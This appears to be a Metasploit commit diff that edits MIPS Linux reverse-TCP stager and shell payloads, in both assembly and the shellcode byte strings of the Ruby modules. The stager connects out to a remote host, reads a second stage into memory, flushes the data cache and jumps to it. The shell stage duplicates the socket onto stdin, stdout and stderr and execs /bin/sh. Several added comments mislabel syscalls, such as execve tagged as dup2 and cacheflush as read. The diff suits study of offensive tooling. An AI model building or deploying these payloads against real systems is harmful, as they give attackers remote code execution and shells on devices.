Fluch data cache and improve documentation

bug/bundler_fix
jvazquez-r7 2014-01-14 14:06:01 -06:00
parent a8806887e9
commit a056d937e7
5 changed files with 41 additions and 3 deletions

View File

@ -41,6 +41,7 @@ main:
# dup2(sockfd, 0) # dup2(sockfd, 0)
# a0: oldfd (sockfd) # a0: oldfd (sockfd)
# a1: newfd (2, 1, 0) # a1: newfd (2, 1, 0)
# v0: syscall = __NR_dup2 (4063)
li $s1, -3 li $s1, -3
nor $s1, $s1, $zero nor $s1, $s1, $zero
add $a0, $s2, $zero add $a0, $s2, $zero
@ -50,12 +51,13 @@ dup2_loop:
syscall 0x40404 syscall 0x40404
li $s0, -1 li $s0, -1
addi $s1, $s1, -1 addi $s1, $s1, -1
bne $s1, $s0, dup2_loop # <dup2_loop> bne $s1, $s0, dup2_loop # <dup2_loop>
# execve("/bin/sh", ["/bin/sh"], NULL) # execve("/bin/sh", ["/bin/sh"], NULL)
# a0: filename "/bin/sh" # a0: filename "/bin/sh"
# a1: argv ["/bin/sh", NULL] # a1: argv ["/bin/sh", NULL]
# a2: envp NULL # a2: envp NULL
# v0: syscall = __NR_dup2 (4011)
li $t8, -1 # load t8 with -1 li $t8, -1 # load t8 with -1
getaddr: # getaddr trick from scut@team-teso.net getaddr: # getaddr trick from scut@team-teso.net
bltzal $t8, getaddr # branch with $ra stored if t8 < 0 bltzal $t8, getaddr # branch with $ra stored if t8 < 0

View File

@ -13,7 +13,7 @@
# #
# Description: # Description:
# #
# Implementation of a MIPS LE Linux reverse TCP stager. # Implementation of a MIPS BE Linux reverse TCP stager.
# #
# File descriptor in $s2. # File descriptor in $s2.
# #
@ -53,6 +53,7 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
@ -75,6 +76,7 @@ main:
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
@ -95,12 +97,26 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)

View File

@ -53,6 +53,7 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
@ -75,6 +76,7 @@ main:
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
@ -95,16 +97,30 @@ main:
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)
lw $s2, -4($sp) lw $s2, -4($sp) # sockfd saved on $s2
jalr $s1 jalr $s1
.set macro .set macro

View File

@ -45,6 +45,8 @@ module Metasploit3
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" + "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" + "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" + "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" + "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
"\xf8\x09" "\xf8\x09"
} }

View File

@ -45,6 +45,8 @@ module Metasploit3
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" + "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" + "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" + "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" + "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
"\x20\x02" "\x20\x02"
} }